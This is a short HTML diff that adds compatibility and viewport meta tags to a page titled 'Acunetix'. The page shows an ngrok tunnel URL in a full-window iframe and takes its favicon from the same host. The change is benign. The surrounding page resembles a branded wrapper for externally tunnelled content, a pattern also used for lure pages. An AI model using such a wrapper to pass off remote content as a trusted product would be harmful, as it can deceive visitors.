--- a/acunetix.html
+++ b/acunetix.html
@@ -3,6 +3,8 @@
 <meta charset="UTF-8">
 <link rel="shortcut icon" type="image/png" href="https://3962eb62.ngrok.io/images/favicon.ico">
 <title>Acunetix</title>
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="initial-scale=1">
 </head>
 <body>
 <iframe src=https://3962eb62.ngrok.io/ width="100%" height="100%" frameborder="0"/>
